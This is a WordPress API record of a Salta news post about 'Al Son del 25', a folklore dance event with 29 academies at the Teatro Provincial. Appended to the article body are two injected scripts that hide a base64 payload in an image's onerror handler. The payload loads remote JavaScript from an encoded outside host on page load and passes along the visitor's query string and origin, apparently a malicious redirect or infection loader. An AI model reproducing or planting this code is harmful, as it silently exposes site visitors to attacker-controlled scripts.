{"id":5167,"date":"2025-05-21T09:26:30","date_gmt":"2025-05-21T12:26:30","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5167"},"modified":"2025-08-13T23:33:08","modified_gmt":"2025-08-14T02:33:08","slug":"al-son-del-25-donde-el-folklore-del-noa-se-une-para-una-nueva-celebracion","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5167","title":{"rendered":"\u201cAl Son del 25\u201d, donde el folklore del NOA se une para una nueva celebraci\u00f3n"},"content":{"rendered":"\n<p><strong><em>Este domingo, el Teatro Provincial ser\u00e1 escenario de un gran evento folkl\u00f3rico con bailarines de toda la regi\u00f3n organizado y articulado por el Ballet Folkl\u00f3rico de la Provincia.<\/em><\/strong><\/p>\n\n\n\n<p>Por tercer a\u00f1o consecutivo, el Ballet Folkl\u00f3rico de la Provincia \u201cGral. Mart\u00edn Miguel de G\u00fcemes\u201d organiza el Encuentro de Academias del NOA \u201cAl Son del 25\u201d, una propuesta art\u00edstica que rinde homenaje a nuestra patria a trav\u00e9s de la danza, la m\u00fasica y las tradiciones del norte argentino. El evento tendr\u00e1 lugar el domingo 25 de mayo a partir de las 17 horas en el Teatro Provincial, y reunir\u00e1 a 29 academias provenientes de diversos puntos de la provincia y del NOA.<br><br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17446-foto-de-archivo.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17446-foto-de-archivo.webp\" alt=\"Foto de archivo\" style=\"width:355px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>La entrada general tiene un valor de $6000 y se puede adquirir tanto en la boleter\u00eda del Teatro como en la plataforma&nbsp;www.saltaticket.gob.ar<br><br>Este espect\u00e1culo est\u00e1 pensado para toda la familia y tiene como objetivo conmemorar una fecha fundamental en nuestra historia a trav\u00e9s del talento de bailarines de todas las edades que se preparan para brindar una puesta en escena \u00fanica.<\/p>\n\n\n\n<p>Durante la jornada, se presentar\u00e1n cuadros folkl\u00f3ricos originales creados especialmente para la ocasi\u00f3n. Las academias mostrar\u00e1n el trabajo que desarrollan a lo largo del a\u00f1o, representando con orgullo a sus localidades. Este a\u00f1o, se suman por primera vez agrupaciones de La Uni\u00f3n, Cachi, Pichanal, Colonia Santa Rosa, Coronel Moldes, Cerrillos, Urundel, Molinos, General G\u00fcemes, Or\u00e1n, Rosario de Lerma y Perico en Jujuy. A ellas se suman 14 academias de la ciudad de Salta.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17447-foto-de-archivo.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17447-foto-de-archivo.webp\" alt=\"Foto de archivo\" style=\"width:353px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>Entre las agrupaciones que participar\u00e1n se encuentran Arte y Tradici\u00f3n, Escuela de Danzas El Pehual, Alma Chaque\u00f1a, Allpapuyo, el Instituto de Formaci\u00f3n Art\u00edstica Don Segundo Sombra, Ballet Mart\u00edn Fierro, Folcloreando con el Cholo, Los Chucaritos, Taller Arte y Sue\u00f1os, el Ballet Municipal Rodolfo Contreras, Academia Ballet Molinos, Supay Malambo, Taller Folkl\u00f3rico UCASAL, Tierra Gaucha, el Instituto y Ballet La Cautiva, Sembrando Caminos, Academia Jes\u00fas Gonz\u00e1lez, La Huella, el Instituto de Folklore El Kakuy, El Guardamonte, la Academia de Danzas Folkl\u00f3ricas El Moro, Alma Gaucha, Alma Salte\u00f1a, Estudio El Jahuel, Ballet Folkl\u00f3rico Danzantes, Escuela de Danzas La L\u00f3pez Pereyra, Ballet Danzam\u00e9rica, I.S.P.A y la Academia Kuyay Pacha.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17448-foto-de-archivo.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17448-foto-de-archivo.webp\" alt=\"Foto de archivo\"\/><\/a><\/figure>\n\n\n\n<p>\u201cAl Son del 25\u201d se consolida como un espacio de encuentro para celebrar nuestras ra\u00edces, poniendo en valor el trabajo de las academias de danza folkl\u00f3rica que, con pasi\u00f3n y dedicaci\u00f3n, preservan y difunden el arte tradicional. La comunidad est\u00e1 invitada a sumarse a esta fiesta del folklore, que ser\u00e1 un verdadero homenaje a nuestra identidad cultural.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este domingo, el Teatro Provincial ser\u00e1 escenario de un gran evento folkl\u00f3rico con bailarines de toda la regi\u00f3n organizado y articulado por el Ballet Folkl\u00f3rico de la Provincia. Por tercer a\u00f1o consecutivo, el Ballet Folkl\u00f3rico de la Provincia \u201cGral. Mart\u00edn Miguel de G\u00fcemes\u201d organiza el Encuentro de Academias del NOA \u201cAl Son del 25\u201d, una [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5168,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-5167","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5167"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5167"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5167\/revisions"}],"predecessor-version":[{"id":6489,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5167\/revisions\/6489"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5168"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5167"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5167"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5167"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}